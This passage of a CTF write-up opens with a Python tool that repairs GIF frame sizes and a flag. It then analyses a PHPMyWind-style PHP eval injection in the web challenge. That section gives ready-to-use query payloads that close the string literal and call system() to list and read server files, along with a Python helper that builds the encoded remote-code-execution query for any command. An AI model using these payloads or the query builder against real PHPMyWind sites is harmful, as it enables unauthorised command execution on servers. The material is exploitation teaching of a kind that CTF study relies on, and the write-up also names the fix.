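            pos = _skip_subblocks(data, pos + 1)   # 1 byte LZW min code size, then data
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (b, pos))


def fix_logical_screen(data: bytes):
    """Grow the logical screen so every frame fits. Returns (patched, old_w, old_h, new_w, new_h)."""
    old_w, old_h = logical_screen(data)
    frames = list(gif_frames(data))
    new_w = max([old_w] + [l + w for l, t, w, h in frames])
    new_h = max([old_h] + [t + h for l, t, w, h in frames])
    patched = bytearray(data)
    struct.pack_into("<HH", patched, 6, new_w, new_h)
    return bytes(patched), old_w, old_h, new_w, new_h


def _constructed_gif() -> bytes:
    """Constructed demo file: 4x4 screen, second frame is 4x8 (no real pixel data)."""
    header = b"GIF89a" + struct.pack("<HHBBB", 4, 4, 0x00, 0, 0)   # no global colour table
    gce = b"\x21\xF9\x04\x00\x0A\x00\x00\x00"                      # graphic control extension

    def frame(left, top, w, h):
        return b"\x2C" + struct.pack("<HHHHB", left, top, w, h, 0) + b"\x02" + b"\x01\x44" + b"\x00"

    return header + gce + frame(0, 0, 4, 4) + gce + frame(0, 0, 4, 8) + b"\x3B"


if __name__ == "__main__":
    # usage: python3 fix_gif.py in.gif out.gif   (no args: run on the constructed demo)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else _constructed_gif()
    patched, ow, oh, nw, nh = fix_logical_screen(data)
    print("frames:", len(list(gif_frames(data))), "screen %dx%d -> %dx%d" % (ow, oh, nw, nh))
    if len(sys.argv) > 2:
        open(sys.argv[2], "wb").write(patched)
```

The frame count printed here also tells you whether "frame 105" exists before you start stepping through the animation in a viewer.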

DASCTF{Kirby_Yyds}

web

迷路的魔法少女

<?php
highlight_file('index.php');

extract($_GET);
error_reporting(0);
function String2Array($data)
{
    if($data == '') return array();
    @eval("\$array = $data;");
    return $array;
}


if(is_array($attrid) && is_array($attrvalue))
{
    $attrstr .= 'array(';
    $attrids = count($attrid);
    for($i=0; $i<$attrids; $i++)
    {
        $attrstr .= '"'.intval($attrid[$i]).'"=>'.'"'.$attrvalue[$i].'"';
        if($i < $attrids-1)
        {
            $attrstr .= ',';
        }
    }
    $attrstr .= ');';
}

String2Array($attrstr);

This is the code-execution vulnerability in the latest version of PHPMyWind: user input is concatenated into PHP source that String2Array() hands to eval(). intval() neutralises the key, but the value is inserted unescaped, so a double quote in attrvalue closes the string literal and whatever follows is executed as PHP.
payload

?attrid[0]=a&attrvalue[0]=")-system('ls /')-("
?attrid[0]=a&attrvalue[0]=")-system('cat /flag.sh')-("
?attrid[0]=a&attrvalue[0]=")-system('cat /etc/timezone')-("
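To see exactly what the server ends up eval-ing, here is an added example in Python (not the challenge's own PHP, which is shown above): it reproduces the string concatenation from the vulnerable code, so a given attrid/attrvalue pair can be turned into the PHP statement it produces, and builds the URL-encoded query for an arbitrary command. `php_intval` is a simplified stand-in for PHP's intval() (decimal prefix only, an assumption that is sufficient here). The fix on the PHP side is to stop eval-ing a string altogether and build the array directly from the two inputs.

```python
import re
from urllib.parse import urlencode


def php_intval(s: str) -> int:
    """Simplified PHP intval(): optional sign and leading decimal digits, otherwise 0."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def build_attrstr(attrid, attrvalue) -> str:
    """Reproduce the $attrstr concatenation from the challenge's index.php."""
    parts = []
    for i, aid in enumerate(attrid):
        value = attrvalue[i] if i < len(attrvalue) else ""   # missing index -> null -> ""
        parts.append('"%d"=>"%s"' % (php_intval(aid), value))
    return "array(" + ",".join(parts) + ");"


def php_eval_line(attrid, attrvalue) -> str:
    """The string passed to eval(): "\\$array = $data;" with $data already ending in ';'."""
    return "$array = " + build_attrstr(attrid, attrvalue) + ";"


def rce_query(cmd: str) -> str:
    """Query string for the writeup's payload shape: close the literal, call system(), reopen it."""
    value = "\")-system('%s')-(\"" % cmd
    return "?" + urlencode({"attrid[0]": "a", "attrvalue[0]": value})


if __name__ == "__main__":
    print(php_eval_line(["a"], ["\")-system('ls /')-(\""]))
    print(rce_query("ls /"))
```

The first print shows `$array = array("0"=>"")-system('ls /')-("");;` : system() runs (and echoes its output) while the expression is being evaluated, and the subtraction that follows only produces an error that error_reporting(0) hides. The leading `"` in the value is the whole bug; any value without a double quote stays a harmless string.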